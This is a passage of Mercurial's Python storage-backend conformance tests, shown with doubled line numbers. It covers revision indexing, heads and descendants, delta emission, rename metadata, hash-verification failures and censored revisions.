251 251
252 252 def testmultiplerevisions(self):
253 253 fulltext0 = b'x' * 1024
254 254 fulltext1 = fulltext0 + b'y'
255 255 fulltext2 = b'y' + fulltext0 + b'z'
256 256
257 257 f = self._makefilefn()
258 258 with self._maketransactionfn() as tr:
259 259 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
260 260 node1 = f.add(fulltext1, None, tr, 1, node0, nullid)
261 261 node2 = f.add(fulltext2, None, tr, 3, node1, nullid)
262 262
263 263 self.assertEqual(len(f), 3)
264 264 self.assertEqual(list(f), [0, 1, 2])
265 265
266 266 gen = iter(f)
267 267 self.assertEqual(next(gen), 0)
268 268 self.assertEqual(next(gen), 1)
269 269 self.assertEqual(next(gen), 2)
270 270
271 271 with self.assertRaises(StopIteration):
272 272 next(gen)
273 273
274 274 self.assertEqual(list(f.revs()), [0, 1, 2])
275 275 self.assertEqual(list(f.revs(0)), [0, 1, 2])
276 276 self.assertEqual(list(f.revs(1)), [1, 2])
277 277 self.assertEqual(list(f.revs(2)), [2])
278 278 self.assertEqual(list(f.revs(3)), [])
279 279 self.assertEqual(list(f.revs(stop=1)), [0, 1])
280 280 self.assertEqual(list(f.revs(stop=2)), [0, 1, 2])
281 281 self.assertEqual(list(f.revs(stop=3)), [0, 1, 2])
282 282 self.assertEqual(list(f.revs(2, 0)), [2, 1, 0])
283 283 self.assertEqual(list(f.revs(2, 1)), [2, 1])
284 284 # TODO this is wrong
285 285 self.assertEqual(list(f.revs(3, 2)), [3, 2])
286 286
287 287 self.assertEqual(f.parents(node0), (nullid, nullid))
288 288 self.assertEqual(f.parents(node1), (node0, nullid))
289 289 self.assertEqual(f.parents(node2), (node1, nullid))
290 290
291 291 self.assertEqual(f.parentrevs(0), (nullrev, nullrev))
292 292 self.assertEqual(f.parentrevs(1), (0, nullrev))
293 293 self.assertEqual(f.parentrevs(2), (1, nullrev))
294 294
295 295 self.assertEqual(f.rev(node0), 0)
296 296 self.assertEqual(f.rev(node1), 1)
297 297 self.assertEqual(f.rev(node2), 2)
298 298
299 299 with self.assertRaises(error.LookupError):
300 300 f.rev(b'\x01' * 20)
301 301
302 302 self.assertEqual(f.node(0), node0)
303 303 self.assertEqual(f.node(1), node1)
304 304 self.assertEqual(f.node(2), node2)
305 305
306 306 with self.assertRaises(IndexError):
307 307 f.node(3)
308 308
309 309 self.assertEqual(f.lookup(node0), node0)
310 310 self.assertEqual(f.lookup(0), node0)
311 311 self.assertEqual(f.lookup(b'0'), node0)
312 312 self.assertEqual(f.lookup(hex(node0)), node0)
313 313
314 314 self.assertEqual(f.lookup(node1), node1)
315 315 self.assertEqual(f.lookup(1), node1)
316 316 self.assertEqual(f.lookup(b'1'), node1)
317 317 self.assertEqual(f.lookup(hex(node1)), node1)
318 318
319 319 self.assertEqual(f.linkrev(0), 0)
320 320 self.assertEqual(f.linkrev(1), 1)
321 321 self.assertEqual(f.linkrev(2), 3)
322 322
323 323 with self.assertRaises(IndexError):
324 324 f.linkrev(3)
325 325
326 326 self.assertFalse(f.iscensored(0))
327 327 self.assertFalse(f.iscensored(1))
328 328 self.assertFalse(f.iscensored(2))
329 329
330 330 with self.assertRaises(IndexError):
331 331 f.iscensored(3)
332 332
333 333 self.assertEqual(f.commonancestorsheads(node1, nullid), [])
334 334 self.assertEqual(f.commonancestorsheads(node1, node0), [node0])
335 335 self.assertEqual(f.commonancestorsheads(node1, node1), [node1])
336 336 self.assertEqual(f.commonancestorsheads(node0, node1), [node0])
337 337 self.assertEqual(f.commonancestorsheads(node1, node2), [node1])
338 338 self.assertEqual(f.commonancestorsheads(node2, node1), [node1])
339 339
340 340 self.assertEqual(list(f.descendants([0])), [1, 2])
341 341 self.assertEqual(list(f.descendants([1])), [2])
342 342 self.assertEqual(list(f.descendants([0, 1])), [1, 2])
343 343
344 344 self.assertEqual(f.heads(), [node2])
345 345 self.assertEqual(f.heads(node0), [node2])
346 346 self.assertEqual(f.heads(node1), [node2])
347 347 self.assertEqual(f.heads(node2), [node2])
348 348
349 349 # TODO this behavior seems wonky. Is it correct? If so, the
350 350 # docstring for heads() should be updated to reflect desired
351 351 # behavior.
352 352 self.assertEqual(f.heads(stop=[node1]), [node1, node2])
353 353 self.assertEqual(f.heads(stop=[node0]), [node0, node2])
354 354 self.assertEqual(f.heads(stop=[node1, node2]), [node1, node2])
355 355
356 356 with self.assertRaises(error.LookupError):
357 357 f.heads(stop=[b'\x01' * 20])
358 358
359 359 self.assertEqual(f.children(node0), [node1])
360 360 self.assertEqual(f.children(node1), [node2])
361 361 self.assertEqual(f.children(node2), [])
362 362
363 363 def testmultipleheads(self):
364 364 f = self._makefilefn()
365 365
366 366 with self._maketransactionfn() as tr:
367 367 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
368 368 node1 = f.add(b'1', None, tr, 1, node0, nullid)
369 369 node2 = f.add(b'2', None, tr, 2, node1, nullid)
370 370 node3 = f.add(b'3', None, tr, 3, node0, nullid)
371 371 node4 = f.add(b'4', None, tr, 4, node3, nullid)
372 372 node5 = f.add(b'5', None, tr, 5, node0, nullid)
373 373
374 374 self.assertEqual(len(f), 6)
375 375
376 376 self.assertEqual(list(f.descendants([0])), [1, 2, 3, 4, 5])
377 377 self.assertEqual(list(f.descendants([1])), [2])
378 378 self.assertEqual(list(f.descendants([2])), [])
379 379 self.assertEqual(list(f.descendants([3])), [4])
380 380 self.assertEqual(list(f.descendants([0, 1])), [1, 2, 3, 4, 5])
381 381 self.assertEqual(list(f.descendants([1, 3])), [2, 4])
382 382
383 383 self.assertEqual(f.heads(), [node2, node4, node5])
384 384 self.assertEqual(f.heads(node0), [node2, node4, node5])
385 385 self.assertEqual(f.heads(node1), [node2])
386 386 self.assertEqual(f.heads(node2), [node2])
387 387 self.assertEqual(f.heads(node3), [node4])
388 388 self.assertEqual(f.heads(node4), [node4])
389 389 self.assertEqual(f.heads(node5), [node5])
390 390
391 391 # TODO this seems wrong.
392 392 self.assertEqual(f.heads(stop=[node0]), [node0, node2, node4, node5])
393 393 self.assertEqual(f.heads(stop=[node1]), [node1, node2, node4, node5])
394 394
395 395 self.assertEqual(f.children(node0), [node1, node3, node5])
396 396 self.assertEqual(f.children(node1), [node2])
397 397 self.assertEqual(f.children(node2), [])
398 398 self.assertEqual(f.children(node3), [node4])
399 399 self.assertEqual(f.children(node4), [])
400 400 self.assertEqual(f.children(node5), [])
401 401
402 402
403 403 class ifiledatatests(basetestcase):
404 404 """Generic tests for the ifiledata interface.
405 405
406 406 All file storage backends for data should conform to the tests in this
407 407 class.
408 408
409 409 Use ``makeifiledatatests()`` to create an instance of this type.
410 410 """
411 411
412 412 def testempty(self):
413 413 f = self._makefilefn()
414 414
415 415 self.assertEqual(f.storageinfo(), {})
416 416 self.assertEqual(
417 417 f.storageinfo(revisionscount=True, trackedsize=True),
418 418 {b'revisionscount': 0, b'trackedsize': 0},
419 419 )
420 420
421 421 self.assertEqual(f.size(nullrev), 0)
422 422
423 423 for i in range(-5, 5):
424 424 if i == nullrev:
425 425 continue
426 426
427 427 with self.assertRaises(IndexError):
428 428 f.size(i)
429 429
430 430 self.assertEqual(f.revision(nullid), b'')
431 431 self.assertEqual(f.rawdata(nullid), b'')
432 432
433 433 with self.assertRaises(error.LookupError):
434 434 f.revision(b'\x01' * 20)
435 435
436 436 self.assertEqual(f.read(nullid), b'')
437 437
438 438 with self.assertRaises(error.LookupError):
439 439 f.read(b'\x01' * 20)
440 440
441 441 self.assertFalse(f.renamed(nullid))
442 442
443 443 with self.assertRaises(error.LookupError):
444 444 f.read(b'\x01' * 20)
445 445
446 446 self.assertTrue(f.cmp(nullid, b''))
447 447 self.assertTrue(f.cmp(nullid, b'foo'))
448 448
449 449 with self.assertRaises(error.LookupError):
450 450 f.cmp(b'\x01' * 20, b'irrelevant')
451 451
452 452 # Emitting empty list is an empty generator.
453 453 gen = f.emitrevisions([])
454 454 with self.assertRaises(StopIteration):
455 455 next(gen)
456 456
457 457 # Emitting null node yields nothing.
458 458 gen = f.emitrevisions([nullid])
459 459 with self.assertRaises(StopIteration):
460 460 next(gen)
461 461
462 462 # Requesting unknown node fails.
463 463 with self.assertRaises(error.LookupError):
464 464 list(f.emitrevisions([b'\x01' * 20]))
465 465
466 466 def testsinglerevision(self):
467 467 fulltext = b'initial'
468 468
469 469 f = self._makefilefn()
470 470 with self._maketransactionfn() as tr:
471 471 node = f.add(fulltext, None, tr, 0, nullid, nullid)
472 472
473 473 self.assertEqual(f.storageinfo(), {})
474 474 self.assertEqual(
475 475 f.storageinfo(revisionscount=True, trackedsize=True),
476 476 {b'revisionscount': 1, b'trackedsize': len(fulltext)},
477 477 )
478 478
479 479 self.assertEqual(f.size(0), len(fulltext))
480 480
481 481 with self.assertRaises(IndexError):
482 482 f.size(1)
483 483
484 484 self.assertEqual(f.revision(node), fulltext)
485 485 self.assertEqual(f.rawdata(node), fulltext)
486 486
487 487 self.assertEqual(f.read(node), fulltext)
488 488
489 489 self.assertFalse(f.renamed(node))
490 490
491 491 self.assertFalse(f.cmp(node, fulltext))
492 492 self.assertTrue(f.cmp(node, fulltext + b'extra'))
493 493
494 494 # Emitting a single revision works.
495 495 gen = f.emitrevisions([node])
496 496 rev = next(gen)
497 497
498 498 self.assertEqual(rev.node, node)
499 499 self.assertEqual(rev.p1node, nullid)
500 500 self.assertEqual(rev.p2node, nullid)
501 501 self.assertIsNone(rev.linknode)
502 502 self.assertEqual(rev.basenode, nullid)
503 503 self.assertIsNone(rev.baserevisionsize)
504 504 self.assertIsNone(rev.revision)
505 505 self.assertIsNone(rev.delta)
506 506
507 507 with self.assertRaises(StopIteration):
508 508 next(gen)
509 509
510 510 # Requesting revision data works.
511 511 gen = f.emitrevisions([node], revisiondata=True)
512 512 rev = next(gen)
513 513
514 514 self.assertEqual(rev.node, node)
515 515 self.assertEqual(rev.p1node, nullid)
516 516 self.assertEqual(rev.p2node, nullid)
517 517 self.assertIsNone(rev.linknode)
518 518 self.assertEqual(rev.basenode, nullid)
519 519 self.assertIsNone(rev.baserevisionsize)
520 520 self.assertEqual(rev.revision, fulltext)
521 521 self.assertIsNone(rev.delta)
522 522
523 523 with self.assertRaises(StopIteration):
524 524 next(gen)
525 525
526 526 # Emitting an unknown node after a known revision results in error.
527 527 with self.assertRaises(error.LookupError):
528 528 list(f.emitrevisions([node, b'\x01' * 20]))
529 529
530 530 def testmultiplerevisions(self):
531 531 fulltext0 = b'x' * 1024
532 532 fulltext1 = fulltext0 + b'y'
533 533 fulltext2 = b'y' + fulltext0 + b'z'
534 534
535 535 f = self._makefilefn()
536 536 with self._maketransactionfn() as tr:
537 537 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
538 538 node1 = f.add(fulltext1, None, tr, 1, node0, nullid)
539 539 node2 = f.add(fulltext2, None, tr, 3, node1, nullid)
540 540
541 541 self.assertEqual(f.storageinfo(), {})
542 542 self.assertEqual(
543 543 f.storageinfo(revisionscount=True, trackedsize=True),
544 544 {
545 545 b'revisionscount': 3,
546 546 b'trackedsize': len(fulltext0)
547 547 + len(fulltext1)
548 548 + len(fulltext2),
549 549 },
550 550 )
551 551
552 552 self.assertEqual(f.size(0), len(fulltext0))
553 553 self.assertEqual(f.size(1), len(fulltext1))
554 554 self.assertEqual(f.size(2), len(fulltext2))
555 555
556 556 with self.assertRaises(IndexError):
557 557 f.size(3)
558 558
559 559 self.assertEqual(f.revision(node0), fulltext0)
560 560 self.assertEqual(f.rawdata(node0), fulltext0)
561 561 self.assertEqual(f.revision(node1), fulltext1)
562 562 self.assertEqual(f.rawdata(node1), fulltext1)
563 563 self.assertEqual(f.revision(node2), fulltext2)
564 564 self.assertEqual(f.rawdata(node2), fulltext2)
565 565
566 566 with self.assertRaises(error.LookupError):
567 567 f.revision(b'\x01' * 20)
568 568
569 569 self.assertEqual(f.read(node0), fulltext0)
570 570 self.assertEqual(f.read(node1), fulltext1)
571 571 self.assertEqual(f.read(node2), fulltext2)
572 572
573 573 with self.assertRaises(error.LookupError):
574 574 f.read(b'\x01' * 20)
575 575
576 576 self.assertFalse(f.renamed(node0))
577 577 self.assertFalse(f.renamed(node1))
578 578 self.assertFalse(f.renamed(node2))
579 579
580 580 with self.assertRaises(error.LookupError):
581 581 f.renamed(b'\x01' * 20)
582 582
583 583 self.assertFalse(f.cmp(node0, fulltext0))
584 584 self.assertFalse(f.cmp(node1, fulltext1))
585 585 self.assertFalse(f.cmp(node2, fulltext2))
586 586
587 587 self.assertTrue(f.cmp(node1, fulltext0))
588 588 self.assertTrue(f.cmp(node2, fulltext1))
589 589
590 590 with self.assertRaises(error.LookupError):
591 591 f.cmp(b'\x01' * 20, b'irrelevant')
592 592
593 593 # Nodes should be emitted in order.
594 594 gen = f.emitrevisions([node0, node1, node2], revisiondata=True)
595 595
596 596 rev = next(gen)
597 597
598 598 self.assertEqual(rev.node, node0)
599 599 self.assertEqual(rev.p1node, nullid)
600 600 self.assertEqual(rev.p2node, nullid)
601 601 self.assertIsNone(rev.linknode)
602 602 self.assertEqual(rev.basenode, nullid)
603 603 self.assertIsNone(rev.baserevisionsize)
604 604 self.assertEqual(rev.revision, fulltext0)
605 605 self.assertIsNone(rev.delta)
606 606
607 607 rev = next(gen)
608 608
609 609 self.assertEqual(rev.node, node1)
610 610 self.assertEqual(rev.p1node, node0)
611 611 self.assertEqual(rev.p2node, nullid)
612 612 self.assertIsNone(rev.linknode)
613 613 self.assertEqual(rev.basenode, node0)
614 614 self.assertIsNone(rev.baserevisionsize)
615 615 self.assertIsNone(rev.revision)
616 616 self.assertEqual(
617 617 rev.delta,
618 618 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
619 619 )
620 620
621 621 rev = next(gen)
622 622
623 623 self.assertEqual(rev.node, node2)
624 624 self.assertEqual(rev.p1node, node1)
625 625 self.assertEqual(rev.p2node, nullid)
626 626 self.assertIsNone(rev.linknode)
627 627 self.assertEqual(rev.basenode, node1)
628 628 self.assertIsNone(rev.baserevisionsize)
629 629 self.assertIsNone(rev.revision)
630 630 self.assertEqual(
631 631 rev.delta,
632 632 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
633 633 )
634 634
635 635 with self.assertRaises(StopIteration):
636 636 next(gen)
637 637
638 638 # Request not in DAG order is reordered to be in DAG order.
639 639 gen = f.emitrevisions([node2, node1, node0], revisiondata=True)
640 640
641 641 rev = next(gen)
642 642
643 643 self.assertEqual(rev.node, node0)
644 644 self.assertEqual(rev.p1node, nullid)
645 645 self.assertEqual(rev.p2node, nullid)
646 646 self.assertIsNone(rev.linknode)
647 647 self.assertEqual(rev.basenode, nullid)
648 648 self.assertIsNone(rev.baserevisionsize)
649 649 self.assertEqual(rev.revision, fulltext0)
650 650 self.assertIsNone(rev.delta)
651 651
652 652 rev = next(gen)
653 653
654 654 self.assertEqual(rev.node, node1)
655 655 self.assertEqual(rev.p1node, node0)
656 656 self.assertEqual(rev.p2node, nullid)
657 657 self.assertIsNone(rev.linknode)
658 658 self.assertEqual(rev.basenode, node0)
659 659 self.assertIsNone(rev.baserevisionsize)
660 660 self.assertIsNone(rev.revision)
661 661 self.assertEqual(
662 662 rev.delta,
663 663 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
664 664 )
665 665
666 666 rev = next(gen)
667 667
668 668 self.assertEqual(rev.node, node2)
669 669 self.assertEqual(rev.p1node, node1)
670 670 self.assertEqual(rev.p2node, nullid)
671 671 self.assertIsNone(rev.linknode)
672 672 self.assertEqual(rev.basenode, node1)
673 673 self.assertIsNone(rev.baserevisionsize)
674 674 self.assertIsNone(rev.revision)
675 675 self.assertEqual(
676 676 rev.delta,
677 677 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
678 678 )
679 679
680 680 with self.assertRaises(StopIteration):
681 681 next(gen)
682 682
683 683 # Unrecognized nodesorder value raises ProgrammingError.
684 684 with self.assertRaises(error.ProgrammingError):
685 685 list(f.emitrevisions([], nodesorder=b'bad'))
686 686
687 687 # nodesorder=storage is recognized. But we can't test it thoroughly
688 688 # because behavior is storage-dependent.
689 689 res = list(
690 690 f.emitrevisions([node2, node1, node0], nodesorder=b'storage')
691 691 )
692 692 self.assertEqual(len(res), 3)
693 693 self.assertEqual({o.node for o in res}, {node0, node1, node2})
694 694
695 695 # nodesorder=nodes forces the order.
696 696 gen = f.emitrevisions(
697 697 [node2, node0], nodesorder=b'nodes', revisiondata=True
698 698 )
699 699
700 700 rev = next(gen)
701 701 self.assertEqual(rev.node, node2)
702 702 self.assertEqual(rev.p1node, node1)
703 703 self.assertEqual(rev.p2node, nullid)
704 704 self.assertEqual(rev.basenode, nullid)
705 705 self.assertIsNone(rev.baserevisionsize)
706 706 self.assertEqual(rev.revision, fulltext2)
707 707 self.assertIsNone(rev.delta)
708 708
709 709 rev = next(gen)
710 710 self.assertEqual(rev.node, node0)
711 711 self.assertEqual(rev.p1node, nullid)
712 712 self.assertEqual(rev.p2node, nullid)
713 713 # Delta behavior is storage dependent, so we can't easily test it.
714 714
715 715 with self.assertRaises(StopIteration):
716 716 next(gen)
717 717
718 718 # assumehaveparentrevisions=False (the default) won't send a delta for
719 719 # the first revision.
720 720 gen = f.emitrevisions({node2, node1}, revisiondata=True)
721 721
722 722 rev = next(gen)
723 723 self.assertEqual(rev.node, node1)
724 724 self.assertEqual(rev.p1node, node0)
725 725 self.assertEqual(rev.p2node, nullid)
726 726 self.assertEqual(rev.basenode, nullid)
727 727 self.assertIsNone(rev.baserevisionsize)
728 728 self.assertEqual(rev.revision, fulltext1)
729 729 self.assertIsNone(rev.delta)
730 730
731 731 rev = next(gen)
732 732 self.assertEqual(rev.node, node2)
733 733 self.assertEqual(rev.p1node, node1)
734 734 self.assertEqual(rev.p2node, nullid)
735 735 self.assertEqual(rev.basenode, node1)
736 736 self.assertIsNone(rev.baserevisionsize)
737 737 self.assertIsNone(rev.revision)
738 738 self.assertEqual(
739 739 rev.delta,
740 740 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
741 741 )
742 742
743 743 with self.assertRaises(StopIteration):
744 744 next(gen)
745 745
746 746 # assumehaveparentrevisions=True allows delta against initial revision.
747 747 gen = f.emitrevisions(
748 748 [node2, node1], revisiondata=True, assumehaveparentrevisions=True
749 749 )
750 750
751 751 rev = next(gen)
752 752 self.assertEqual(rev.node, node1)
753 753 self.assertEqual(rev.p1node, node0)
754 754 self.assertEqual(rev.p2node, nullid)
755 755 self.assertEqual(rev.basenode, node0)
756 756 self.assertIsNone(rev.baserevisionsize)
757 757 self.assertIsNone(rev.revision)
758 758 self.assertEqual(
759 759 rev.delta,
760 760 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
761 761 )
762 762
763 763 # forceprevious=True forces a delta against the previous revision.
764 764 # Special case for initial revision.
765 765 gen = f.emitrevisions(
766 766 [node0], revisiondata=True, deltamode=repository.CG_DELTAMODE_PREV
767 767 )
768 768
769 769 rev = next(gen)
770 770 self.assertEqual(rev.node, node0)
771 771 self.assertEqual(rev.p1node, nullid)
772 772 self.assertEqual(rev.p2node, nullid)
773 773 self.assertEqual(rev.basenode, nullid)
774 774 self.assertIsNone(rev.baserevisionsize)
775 775 self.assertIsNone(rev.revision)
776 776 self.assertEqual(
777 777 rev.delta,
778 778 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' + fulltext0,
779 779 )
780 780
781 781 with self.assertRaises(StopIteration):
782 782 next(gen)
783 783
784 784 gen = f.emitrevisions(
785 785 [node0, node2],
786 786 revisiondata=True,
787 787 deltamode=repository.CG_DELTAMODE_PREV,
788 788 )
789 789
790 790 rev = next(gen)
791 791 self.assertEqual(rev.node, node0)
792 792 self.assertEqual(rev.p1node, nullid)
793 793 self.assertEqual(rev.p2node, nullid)
794 794 self.assertEqual(rev.basenode, nullid)
795 795 self.assertIsNone(rev.baserevisionsize)
796 796 self.assertIsNone(rev.revision)
797 797 self.assertEqual(
798 798 rev.delta,
799 799 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' + fulltext0,
800 800 )
801 801
802 802 rev = next(gen)
803 803 self.assertEqual(rev.node, node2)
804 804 self.assertEqual(rev.p1node, node1)
805 805 self.assertEqual(rev.p2node, nullid)
806 806 self.assertEqual(rev.basenode, node0)
807 807
808 808 with self.assertRaises(StopIteration):
809 809 next(gen)
810 810
811 811 def testrenamed(self):
812 812 fulltext0 = b'foo'
813 813 fulltext1 = b'bar'
814 814 fulltext2 = b'baz'
815 815
816 816 meta1 = {
817 817 b'copy': b'source0',
818 818 b'copyrev': b'a' * 40,
819 819 }
820 820
821 821 meta2 = {
822 822 b'copy': b'source1',
823 823 b'copyrev': b'b' * 40,
824 824 }
825 825
826 826 stored1 = b''.join(
827 827 [
828 828 b'\x01\ncopy: source0\n',
829 829 b'copyrev: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\x01\n',
830 830 fulltext1,
831 831 ]
832 832 )
833 833
834 834 stored2 = b''.join(
835 835 [
836 836 b'\x01\ncopy: source1\n',
837 837 b'copyrev: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\n\x01\n',
838 838 fulltext2,
839 839 ]
840 840 )
841 841
842 842 f = self._makefilefn()
843 843 with self._maketransactionfn() as tr:
844 844 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
845 845 node1 = f.add(fulltext1, meta1, tr, 1, node0, nullid)
846 846 node2 = f.add(fulltext2, meta2, tr, 2, nullid, nullid)
847 847
848 848 # Metadata header isn't recognized when parent isn't nullid.
849 849 self.assertEqual(f.size(1), len(stored1))
850 850 self.assertEqual(f.size(2), len(fulltext2))
851 851
852 852 self.assertEqual(f.revision(node1), stored1)
853 853 self.assertEqual(f.rawdata(node1), stored1)
854 854 self.assertEqual(f.revision(node2), stored2)
855 855 self.assertEqual(f.rawdata(node2), stored2)
856 856
857 857 self.assertEqual(f.read(node1), fulltext1)
858 858 self.assertEqual(f.read(node2), fulltext2)
859 859
860 860 # Returns False when first parent is set.
861 861 self.assertFalse(f.renamed(node1))
862 862 self.assertEqual(f.renamed(node2), (b'source1', b'\xbb' * 20))
863 863
864 864 self.assertTrue(f.cmp(node1, fulltext1))
865 865 self.assertTrue(f.cmp(node1, stored1))
866 866 self.assertFalse(f.cmp(node2, fulltext2))
867 867 self.assertTrue(f.cmp(node2, stored2))
868 868
869 869 def testmetadataprefix(self):
870 870 # Content with metadata prefix has extra prefix inserted in storage.
871 871 fulltext0 = b'\x01\nfoo'
872 872 stored0 = b'\x01\n\x01\n\x01\nfoo'
873 873
874 874 fulltext1 = b'\x01\nbar'
875 875 meta1 = {
876 876 b'copy': b'source0',
877 877 b'copyrev': b'b' * 40,
878 878 }
879 879 stored1 = b''.join(
880 880 [
881 881 b'\x01\ncopy: source0\n',
882 882 b'copyrev: %s\n' % (b'b' * 40),
883 883 b'\x01\n\x01\nbar',
884 884 ]
885 885 )
886 886
887 887 f = self._makefilefn()
888 888 with self._maketransactionfn() as tr:
889 889 node0 = f.add(fulltext0, {}, tr, 0, nullid, nullid)
890 890 node1 = f.add(fulltext1, meta1, tr, 1, nullid, nullid)
891 891
892 892 # TODO this is buggy.
893 893 self.assertEqual(f.size(0), len(fulltext0) + 4)
894 894
895 895 self.assertEqual(f.size(1), len(fulltext1))
896 896
897 897 self.assertEqual(f.revision(node0), stored0)
898 898 self.assertEqual(f.rawdata(node0), stored0)
899 899
900 900 self.assertEqual(f.revision(node1), stored1)
901 901 self.assertEqual(f.rawdata(node1), stored1)
902 902
903 903 self.assertEqual(f.read(node0), fulltext0)
904 904 self.assertEqual(f.read(node1), fulltext1)
905 905
906 906 self.assertFalse(f.cmp(node0, fulltext0))
907 907 self.assertTrue(f.cmp(node0, stored0))
908 908
909 909 self.assertFalse(f.cmp(node1, fulltext1))
910 910 self.assertTrue(f.cmp(node1, stored0))
911 911
912 912 def testbadnoderead(self):
913 913 f = self._makefilefn()
914 914
915 915 fulltext0 = b'foo\n' * 30
916 916 fulltext1 = fulltext0 + b'bar\n'
917 917
918 918 with self._maketransactionfn() as tr:
919 919 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
920 920 node1 = b'\xaa' * 20
921 921
922 922 self._addrawrevisionfn(
923 923 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
924 924 )
925 925
926 926 self.assertEqual(len(f), 2)
927 927 self.assertEqual(f.parents(node1), (node0, nullid))
928 928
929 929 # revision() raises since it performs hash verification.
930 930 with self.assertRaises(error.StorageError):
931 931 f.revision(node1)
932 932
933 933 # rawdata() still verifies because there are no special storage
934 934 # settings.
935 935 with self.assertRaises(error.StorageError):
936 936 f.rawdata(node1)
937 937
938 938 # read() behaves like revision().
939 939 with self.assertRaises(error.StorageError):
940 940 f.read(node1)
941 941
942 942 # We can't test renamed() here because some backends may not require
943 943 # reading/validating the fulltext to return rename metadata.
944 944
945 945 def testbadnoderevisionraw(self):
946 946 # Like above except we test rawdata() first to isolate
947 947 # revision caching behavior.
948 948 f = self._makefilefn()
949 949
950 950 fulltext0 = b'foo\n' * 30
951 951 fulltext1 = fulltext0 + b'bar\n'
952 952
953 953 with self._maketransactionfn() as tr:
954 954 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
955 955 node1 = b'\xaa' * 20
956 956
957 957 self._addrawrevisionfn(
958 958 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
959 959 )
960 960
961 961 with self.assertRaises(error.StorageError):
962 962 f.rawdata(node1)
963 963
964 964 with self.assertRaises(error.StorageError):
965 965 f.rawdata(node1)
966 966
967 967 def testbadnoderevisionraw(self):
968 968 # Like above except we test read() first to isolate revision caching
969 969 # behavior.
970 970 f = self._makefilefn()
971 971
972 972 fulltext0 = b'foo\n' * 30
973 973 fulltext1 = fulltext0 + b'bar\n'
974 974
975 975 with self._maketransactionfn() as tr:
976 976 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
977 977 node1 = b'\xaa' * 20
978 978
979 979 self._addrawrevisionfn(
980 980 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
981 981 )
982 982
983 983 with self.assertRaises(error.StorageError):
984 984 f.read(node1)
985 985
986 986 with self.assertRaises(error.StorageError):
987 987 f.read(node1)
988 988
989 989 def testbadnodedelta(self):
990 990 f = self._makefilefn()
991 991
992 992 fulltext0 = b'foo\n' * 31
993 993 fulltext1 = fulltext0 + b'bar\n'
994 994 fulltext2 = fulltext1 + b'baz\n'
995 995
996 996 with self._maketransactionfn() as tr:
997 997 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
998 998 node1 = b'\xaa' * 20
999 999
1000 1000 self._addrawrevisionfn(
1001 1001 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
1002 1002 )
1003 1003
1004 1004 with self.assertRaises(error.StorageError):
1005 1005 f.read(node1)
1006 1006
1007 1007 node2 = storageutil.hashrevisionsha1(fulltext2, node1, nullid)
1008 1008
1009 1009 with self._maketransactionfn() as tr:
1010 1010 delta = mdiff.textdiff(fulltext1, fulltext2)
1011 1011 self._addrawrevisionfn(
1012 1012 f, tr, node2, node1, nullid, 2, delta=(1, delta)
1013 1013 )
1014 1014
1015 1015 self.assertEqual(len(f), 3)
1016 1016
1017 1017 # Assuming a delta is stored, we shouldn't need to validate node1 in
1018 1018 # order to retrieve node2.
1019 1019 self.assertEqual(f.read(node2), fulltext2)
1020 1020
1021 1021 def testcensored(self):
1022 1022 f = self._makefilefn()
1023 1023
1024 1024 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1025 1025
1026 1026 with self._maketransactionfn() as tr:
1027 1027 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1028 1028
1029 1029 # The node value doesn't matter since we can't verify it.
1030 1030 node1 = b'\xbb' * 20
1031 1031
1032 1032 self._addrawrevisionfn(
1033 1033 f, tr, node1, node0, nullid, 1, stored1, censored=True
1034 1034 )
1035 1035
1036 1036 self.assertTrue(f.iscensored(1))
1037 1037
1038 1038 with self.assertRaises(error.CensoredNodeError):
1039 1039 f.revision(1)
1040 1040
1041 1041 with self.assertRaises(error.CensoredNodeError):
1042 1042 f.rawdata(1)
1043 1043
1044 1044 with self.assertRaises(error.CensoredNodeError):
1045 1045 f.read(1)
1046 1046
1047 1047 def testcensoredrawrevision(self):
1048 1048 # Like above, except we do the rawdata() request first to
1049 1049 # isolate revision caching behavior.
1050 1050
1051 1051 f = self._makefilefn()
1052 1052
1053 1053 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1054 1054
1055 1055 with self._maketransactionfn() as tr:
1056 1056 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1057 1057
1058 1058 # The node value doesn't matter since we can't verify it.
1059 1059 node1 = b'\xbb' * 20
1060 1060
1061 1061 self._addrawrevisionfn(
1062 1062 f, tr, node1, node0, nullid, 1, stored1, censored=True
1063 1063 )
1064 1064
1065 1065 with self.assertRaises(error.CensoredNodeError):
1066 1066 f.rawdata(1)
1067 1067
1068 1068
1069 1069 class ifilemutationtests(basetestcase):
1070 1070 """Generic tests for the ifilemutation interface.
1071 1071
1072 1072 All file storage backends that support writing should conform to this
1073 1073 interface.
1074 1074
1075 1075 Use ``makeifilemutationtests()`` to create an instance of this type.
1076 1076 """
1077 1077
1078 1078 def testaddnoop(self):
1079 1079 f = self._makefilefn()
1080 1080 with self._maketransactionfn() as tr:
1081 1081 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1082 1082 node1 = f.add(b'foo', None, tr, 0, nullid, nullid)
